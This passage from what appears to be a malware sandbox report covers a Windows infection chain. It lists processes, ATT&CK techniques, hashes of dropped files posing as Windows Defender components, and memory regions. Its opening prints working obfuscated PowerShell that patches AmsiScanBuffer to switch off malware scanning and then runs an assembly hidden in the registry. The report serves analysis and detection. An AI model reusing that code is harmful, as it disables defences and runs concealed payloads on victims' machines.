Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'le'+[Char](99)+''+[Char](116)+'edD'+'e'+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsi'+[Char](67)+'la'+'s'+''+'s'+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$qezYBtiCZKu.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+'l'+''+[Char](78)+'a'+[Char](109)+'e,'+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+'P'+''+'u'+'bl'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$QbHtJrODohwPbN).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qezYBtiCZKu.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+'g'+',N'+[Char](101)+''+'w'+''+'S'+'l'+[Char](111)+''+'t'+',V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$ZyNGoKdKac,$QbHtJrODohwPbN).SetImplementationFlags(''+'R'+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $qezYBtiCZKu.CreateType();}$oBYPuQRAMykOb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+'o'+'s'+'o'+'f'+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+'o'+'B'+[Char](89)+''+[Char](80)+'u'+'Q'+''+[Char](82)+''+[Char](65)+''+[Char](77)+''+'y'+''+'k'+''+[Char](79)+''+'b'+'');$wcZiDciKXAqWbQ=$oBYPuQRAMykOb.GetMethod(''+[Char](119)+''+[Char](99)+''+[Char](90)+'iD'+'c'+''+[Char](105)+'KX'+[Char](65)+''+'q'+''+'W'+''+[Char](98)+''+[Char](81)+'',[Reflection.BindingFlags]'Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QAbllKCDDTKYDUtYdvd=YnxyzZBzoApQ @([String])([IntPtr]);$fPVxNRpZtqQfbTZLYrqYfU=YnxyzZBzoApQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CsSMymabpPq=$oBYPuQRAMykOb.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$SikbvlrZlIQChB=$wcZiDciKXAqWbQ.Invoke($Null,@([Object]$CsSMymabpPq,[Object](''+'L'+'o'+'a'+''+'d'+''+'L'+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$kcaPOnwqfDSJBAwIE=$wcZiDciKXAqWbQ.Invoke($Null,@([Object]$CsSMymabpPq,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+'r'+'ot'+[Char](101)+''+[Char](99)+''+'t'+'')));$cDpXROv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SikbvlrZlIQChB,$QAbllKCDDTKYDUtYdvd).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+'l');$bwXlcPuQSQiTxXJlW=$wcZiDciKXAqWbQ.Invoke($Null,@([Object]$cDpXROv,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+'ff'+'e'+''+[Char](114)+'')));$DQdFgstflC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kcaPOnwqfDSJBAwIE,$fPVxNRpZtqQfbTZLYrqYfU).Invoke($bwXlcPuQSQiTxXJlW,[uint32]8,4,[ref]$DQdFgstflC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bwXlcPuQSQiTxXJlW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kcaPOnwqfDSJBAwIE,$fPVxNRpZtqQfbTZLYrqYfU).Invoke($bwXlcPuQSQiTxXJlW,[uint32]8,0x20,[ref]$DQdFgstflC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+'a'+''+[Char](108)+'e'+'r'+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
PID:3372

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
"C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe"
1⤵
PID:3080

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e82fd6fe-8a67-4b54-a6d4-7282ea733d48}
1⤵
PID:428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
e4628c1831a566d7e61da8721cae0aec

SHA1
2587dd3ff6d5be01c24aef67ff83734f70b951e7

SHA256
8f4c4b2e2cffbf5cd3dc910e5d9ca72b61d6426b818d722e42cf1a52386783de

SHA512
3399a35d6ed4315390a489c327d9813fb06242f578e3396b70c533bd9b924a7fa8970b790830fc643c91ac499c4e1e8dd648cf4aadfa3608caa7cf2bd90cf497

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c697637a9b17f577fccd7e83a5495810

SHA1
04e6054584786b88994b0e0a871562227fe2a435

SHA256
54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164

SHA512
66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
79fd3a493d0d3a5b81166bf0be5f5bc5

SHA1
1b029aba64346d81ca3524b6ec96774e4518171f

SHA256
c294eb3d0335bcb16860f71d96ba45c778e517eb90c1415c4bf6b4230d39bd1f

SHA512
224494fb368e2489eb6db7c7332908aa5221be045788a6c6b83a6c87063c7e5ebecc2382344907c03311a5f8c3e325b958c228138da21b5bcfb12ea60d67fd21

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
e2fb72e358e13e40ae8327c3a9df8165

SHA1
b40aceed9393e3d4c289b2cf477dd5dee76a39da

SHA256
d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408

SHA512
b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
248KB

MD5
18ec6f65d276ea2173b26e7ca013190e

SHA1
f24d95a1069ccbde30ece236d72c7553689c890b

SHA256
5d5e9a03a29d4e638a175b889a5bb73fbcb0809ac83aa6966324fe86ac408d17

SHA512
33e2c237be627d032d9b1db91aa8446b06b9526f55dffc68c8eec55aedd6a747f2231dc1a4ab730590bb1a4407136b78ff6fa472643078b03dc665f781e31573

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/116-236-0x0000000000000000-mapping.dmp

Download
memory/428-241-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/428-242-0x0000000140002314-mapping.dmp

Download
memory/428-244-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/428-245-0x00007FFCB9430000-0x00007FFCB9625000-memory.dmp

Filesize
2.0MB

Download
memory/428-246-0x00007FFCB8EB0000-0x00007FFCB8F6E000-memory.dmp

Filesize
760KB

Download
memory/520-231-0x0000000000000000-mapping.dmp

Download
memory/640-132-0x0000000000000000-mapping.dmp

Download
memory/640-139-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/640-133-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/820-228-0x0000000000000000-mapping.dmp

Download
memory/940-199-0x0000000000000000-mapping.dmp

Download
memory/1104-225-0x0000000000000000-mapping.dmp

Download
memory/1256-226-0x0000000000000000-mapping.dmp

Download
memory/1340-223-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1340-222-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-198-0x0000000000000000-mapping.dmp

Download
memory/1448-201-0x0000000000000000-mapping.dmp

Download
memory/1468-193-0x0000000000000000-mapping.dmp

Download
memory/1556-233-0x0000000000000000-mapping.dmp

Download
memory/1776-230-0x0000000000000000-mapping.dmp

Download
memory/1856-207-0x00007FFC9A730000-0x00007FFC9B1F1000-memory.dmp

Filesize
10.8MB

Download
memory/1856-205-0x00007FFC9A730000-0x00007FFC9B1F1000-memory.dmp

Filesize
10.8MB

Download
memory/1856-206-0x0000019B994B9000-0x0000019B994BF000-memory.dmp

Filesize
24KB

Download
memory/1856-208-0x0000019B994B9000-0x0000019B994BF000-memory.dmp

Filesize
24KB

Download
memory/1876-202-0x0000000000000000-mapping.dmp

Download
memory/2416-174-0x000001CFFD220000-0x000001CFFD242000-memory.dmp

Filesize
136KB

Download
memory/2416-189-0x000001CFFDE30000-0x000001CFFDE38000-memory.dmp

Filesize
32KB

Download
memory/2416-184-0x000001CFFDE40000-0x000001CFFDE5C000-memory.dmp

Filesize
112KB

Download
memory/2416-179-0x00007FFC9A730000-0x00007FFC9B1F1000-memory.dmp

Filesize
10.8MB

Download
memory/2416-178-0x000001CFFDE10000-0x000001CFFDE1A000-memory.dmp

Filesize
40KB

Download
memory/2416-187-0x000001CFFDE20000-0x000001CFFDE2A000-memory.dmp

Filesize
40KB

Download
memory/2416-188-0x000001CFFDE80000-0x000001CFFDE9A000-memory.dmp

Filesize
104KB

Download
memory/2416-177-0x000001CFFDD30000-0x000001CFFDD4C000-memory.dmp

Filesize
112KB

Download
memory/2416-190-0x000001CFFDE60000-0x000001CFFDE66000-memory.dmp

Filesize
24KB

Download
memory/2416-191-0x000001CFFDE70000-0x000001CFFDE7A000-memory.dmp

Filesize
40KB

Download
memory/2416-192-0x00007FFC9A730000-0x00007FFC9B1F1000-memory.dmp

Filesize
10.8MB

Download
memory/2524-204-0x0000000000000000-mapping.dmp

Download
memory/2684-159-0x0000000000000000-mapping.dmp

Download
memory/2684-173-0x0000000000150000-0x000000000018E000-memory.dmp

Filesize
248KB

Download
memory/2752-203-0x0000000000000000-mapping.dmp

Download
memory/2896-200-0x0000000000000000-mapping.dmp

Download
memory/3208-196-0x0000000000000000-mapping.dmp

Download
memory/3268-234-0x0000000000000000-mapping.dmp

Download
memory/3372-215-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/3372-239-0x00007FFCB9430000-0x00007FFCB9625000-memory.dmp

Filesize
2.0MB

Download
memory/3372-240-0x00007FFCB8EB0000-0x00007FFCB8F6E000-memory.dmp

Filesize
760KB

Download
memory/3388-165-0x0000000000000000-mapping.dmp

Download
memory/3704-238-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/3900-227-0x0000000000000000-mapping.dmp

Download
memory/4284-229-0x0000000000000000-mapping.dmp

Download
memory/4344-161-0x0000000000000000-mapping.dmp

Download
memory/4344-186-0x00000000026C6000-0x0000000002803000-memory.dmp

Filesize
1.2MB

Download
memory/4344-237-0x00000000021B0000-0x00000000026B4000-memory.dmp

Filesize
5.0MB

Download
memory/4344-180-0x00000000021B0000-0x00000000026B4000-memory.dmp

Filesize
5.0MB

Download
memory/4684-210-0x00007FF7B5E51938-mapping.dmp

Download
memory/4764-212-0x0000000000000000-mapping.dmp

Download
memory/4840-218-0x0000000006000000-0x000000000601E000-memory.dmp

Filesize
120KB

Download
memory/4840-220-0x0000000006E90000-0x0000000007052000-memory.dmp

Filesize
1.8MB

Download
memory/4840-181-0x00000000058A0000-0x0000000005EB8000-memory.dmp

Filesize
6.1MB

Download
memory/4840-216-0x0000000005640000-0x00000000056B6000-memory.dmp

Filesize
472KB

Download
memory/4840-217-0x00000000056C0000-0x0000000005752000-memory.dmp

Filesize
584KB

Download
memory/4840-167-0x0000000000000000-mapping.dmp

Download
memory/4840-219-0x0000000006C70000-0x0000000006CC0000-memory.dmp

Filesize
320KB

Download
memory/4840-182-0x0000000005280000-0x0000000005292000-memory.dmp

Filesize
72KB

Download
memory/4840-221-0x0000000007590000-0x0000000007ABC000-memory.dmp

Filesize
5.2MB

Download
memory/4840-183-0x00000000053B0000-0x00000000054BA000-memory.dmp

Filesize
1.0MB

Download
memory/4840-185-0x00000000052E0000-0x000000000531C000-memory.dmp

Filesize
240KB

Download
memory/4840-168-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4848-197-0x0000000000000000-mapping.dmp

Download
memory/4968-213-0x00007FFC9AB30000-0x00007FFC9B5F1000-memory.dmp

Filesize
10.8MB

Download
memory/4972-158-0x00000000089F0000-0x0000000008F94000-memory.dmp

Filesize
5.6MB

Download
memory/4972-145-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/4972-150-0x0000000007DC0000-0x000000000843A000-memory.dmp

Filesize
6.5MB

Download
memory/4972-149-0x0000000006A00000-0x0000000006A1E000-memory.dmp

Filesize
120KB

Download
memory/4972-148-0x00000000756E0000-0x000000007572C000-memory.dmp

Filesize
304KB

Download
memory/4972-147-0x0000000006A20000-0x0000000006A52000-memory.dmp

Filesize
200KB

Download
memory/4972-151-0x0000000007780000-0x000000000779A000-memory.dmp

Filesize
104KB

Download
memory/4972-152-0x00000000077F0000-0x00000000077FA000-memory.dmp

Filesize
40KB

Download
memory/4972-146-0x00000000063B0000-0x00000000063CE000-memory.dmp

Filesize
120KB

Download
memory/4972-157-0x00000000079E0000-0x0000000007A02000-memory.dmp

Filesize
136KB

Download
memory/4972-153-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/4972-154-0x00000000067C0000-0x00000000067CE000-memory.dmp

Filesize
56KB

Download
memory/4972-156-0x0000000006810000-0x0000000006818000-memory.dmp

Filesize
32KB

Download
memory/4972-155-0x0000000006820000-0x000000000683A000-memory.dmp

Filesize
104KB

Download
memory/4972-144-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download
memory/4972-143-0x00000000054A0000-0x00000000054C2000-memory.dmp

Filesize
136KB

Download
memory/4972-142-0x0000000005580000-0x0000000005BA8000-memory.dmp

Filesize
6.2MB

Download
memory/4972-141-0x0000000002DE0000-0x0000000002E16000-memory.dmp

Filesize
216KB

Download
memory/4972-140-0x0000000000000000-mapping.dmp

Download